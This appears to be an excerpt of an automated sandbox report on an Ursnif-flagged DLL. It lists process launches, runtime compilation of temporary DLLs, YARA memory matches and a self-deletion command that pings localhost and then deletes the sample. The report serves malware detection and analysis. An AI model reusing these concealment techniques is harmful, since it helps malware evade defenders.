Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline

Persistence and Installation Behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pqvogmwc.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\sjfy431f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\0hsihch1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oeprcmty.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Self deletion via cmd delete

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
